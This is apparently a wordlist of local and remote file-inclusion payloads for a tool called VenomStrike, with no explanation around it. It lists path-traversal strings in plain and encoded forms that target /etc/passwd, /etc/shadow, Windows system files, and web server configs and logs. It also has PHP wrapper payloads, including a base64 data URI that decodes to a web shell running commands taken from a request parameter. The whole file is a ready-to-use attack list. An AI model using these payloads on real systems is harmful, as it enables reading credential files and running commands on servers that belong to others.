# VenomStrike LFI/RFI Payloads
../../../../etc/passwd
../../../etc/passwd
../../etc/passwd
../etc/passwd
/etc/passwd
..\..\..\..\windows\win.ini
..\..\..\..\windows\system32\drivers\etc\hosts
....//....//....//etc/passwd
..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
....//....//....//....//etc/passwd
..%252f..%252f..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc/passwd
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/convert.base64-encode/resource=index.php
php://input
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
expect://id
/proc/self/environ
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/httpd/access_log
/var/log/auth.log
C:\Windows\win.ini
C:\Windows\system.ini
C:\boot.ini
C:\Windows\system32\drivers\etc\hosts
..%00/etc/passwd
....\/....\/....\/etc/passwd
..%5c..%5c..%5cetc/passwd
/etc/shadow
/etc/hosts
/etc/apache2/apache2.conf
/etc/nginx/nginx.conf
/etc/mysql/my.cnf
/proc/version
/proc/self/cmdline
/proc/self/status